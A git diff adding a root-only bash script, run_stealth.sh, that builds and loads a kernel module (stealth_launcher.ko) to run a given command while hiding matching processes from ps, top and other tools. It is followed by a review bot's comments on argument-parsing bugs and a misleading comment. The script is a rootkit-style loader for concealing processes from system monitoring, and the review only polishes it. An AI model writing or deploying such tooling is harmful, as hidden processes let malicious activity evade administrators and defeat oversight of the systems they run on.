Diffstat (limited to 'run_stealth.sh')
-rwxr-xr-x | run_stealth.sh | 122 |
1 files changed, 122 insertions, 0 deletions
diff --git a/run_stealth.sh b/run_stealth.sh
new file mode 100755
index 0000000..04bd5bf
--- /dev/null
+++ b/run_stealth.sh
@@ -0,0 +1,122 @@
+#!/bin/bash
+
+# run_stealth.sh - Helper script to run commands with process hiding
+# Usage: ./run_stealth.sh -c "sleep 120" -p "sleep"
+
+# Default values
+STEALTH_CMD=""
+HIDE_PATTERN=""
+AUTO_CLEANUP=1
+
+# Parse command line arguments
+while [[ $# -gt 0 ]]; do
+ case $1 in
+ -c|--command)
+ STEALTH_CMD="$2"
+ shift 2
+ ;;
+ -p|--pattern)
+ HIDE_PATTERN="$2"
+ shift 2
+ ;;
+ -a|--auto-cleanup)
+ AUTO_CLEANUP="$2"
+ shift 2
+ ;;
+ *)
+ # For backward compatibility
+ if [ -z "$STEALTH_CMD" ]; then
+ STEALTH_CMD="$1"
+ fi
+ shift
+ ;;
+ esac
+done
+
+# Check if any command was provided
+if [ -z "$STEALTH_CMD" ]; then
+ echo "Usage: $0 -c \"command to run in stealth mode\" [-p \"pattern to hide\"] [-a 0|1]"
+ echo "Example: $0 -c \"sleep 120\" -p \"sleep\""
+ echo " -a 1 Enable auto-cleanup (default)"
+ echo " -a 0 Disable auto-cleanup"
+ echo " or: $0 \"command to run in stealth mode\" (backward compatibility)"
+ exit 1
+fi
+
+# Check if user is root
+if [ "$EUID" -ne 0 ]; then
+ echo "This script must be run as root"
+ exit 1
+fi
+
+# Build the kernel module if it's not already built
+if [ ! -f "stealth_launcher.ko" ]; then
+ echo "Building kernel module..."
+ make stealth_launcher.ko >/dev/null 2>&1
+ if [ $? -ne 0 ]; then
+ echo "Failed to build the kernel module"
+ exit 1
+ fi
+fi
+
+# Remove any existing module first
+if lsmod | grep -q "stealth_launcher"; then
+ echo "Removing existing stealth_launcher module..."
+ rmmod stealth_launcher >/dev/null 2>&1
+fi
+
+# Prepare module parameters (with proper escaping)
+MODULE_PARAMS=""
+
+# Escape special characters in the command
+ESCAPED_CMD=$(echo "$STEALTH_CMD" | sed 's/"/\\"/g')
+MODULE_PARAMS="target_cmd=\"$ESCAPED_CMD\""
+
+# Add hide pattern if specified
+if [ -n "$HIDE_PATTERN" ]; then
+ ESCAPED_PATTERN=$(echo "$HIDE_PATTERN" | sed 's/"/\\"/g')
+ MODULE_PARAMS="$MODULE_PARAMS hide_pattern=\"$ESCAPED_PATTERN\""
+fi
+
+# Add auto-cleanup parameter
+MODULE_PARAMS="$MODULE_PARAMS auto_cleanup=$AUTO_CLEANUP"
+
+# Hide module and insmod process to avoid showing in ps/top
+if ! echo 1 > /dev/null; then
+ echo "Hiding module loader processes disabled"
+fi
+
+# Load the kernel module with the parameters
+echo "Loading stealth_launcher with parameters: $MODULE_PARAMS"
+echo "Auto-cleanup mode: $([ "$AUTO_CLEANUP" -eq 1 ] && echo "enabled" || echo "disabled")"
+insmod stealth_launcher.ko $MODULE_PARAMS >/dev/null 2>&1
+RESULT=$?
+
+if [ $RESULT -eq 0 ]; then
+ echo "Command launched in stealth mode"
+ echo "Process will be hidden from ps, top, and other tools"
+
+ if [ "$AUTO_CLEANUP" -eq 1 ]; then
+ echo "Module will automatically unload when process completes"
+ else
+ echo "To unhide processes, run: rmmod stealth_launcher"
+ fi
+
+ # If auto-cleanup is disabled, we need to keep the script running
+ if [ "$AUTO_CLEANUP" -eq 0 ]; then
+ # Wait quietly to keep stealth script running
+ sleep 1
+
+ # In background mode
+ exec > /dev/null 2>&1
+
+ # Keep script running to maintain stealth chain
+ tail -f /dev/null
+ fi
+else
+ echo "Failed to load module. Check kernel log for details."
+ echo "Try dmesg | tail"
+ exit 1
+fi
+
+exit 0
\ No newline at end of file |
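Review bot: In the argument loop, `-c`, `-p` and `-a` read `$2` and call `shift 2` without checking that a value follows; when one of them is the last argument, bash's `shift 2` fails and leaves the positional parameters unchanged, so the `while [[ $# -gt 0 ]]` loop never ends. A guard such as `[[ $# -ge 2 ]] || { echo "missing value for $1" >&2; exit 1; }` before each `shift 2` closes that. The `-a` value is also never checked against `0|1`, yet it is pasted into the string handed to `insmod` as root and into `[ "$AUTO_CLEANUP" -eq 1 ]`; reject anything else right after parsing, e.g. `case "$AUTO_CLEANUP" in 0|1) ;; *) echo "-a takes 0 or 1" >&2; exit 1 ;; esac`. Separately, the `if ! echo 1 > /dev/null` block is a no-op whose comment describes behaviour the code does not implement, so the comment should state what actually runs or the block should be dropped.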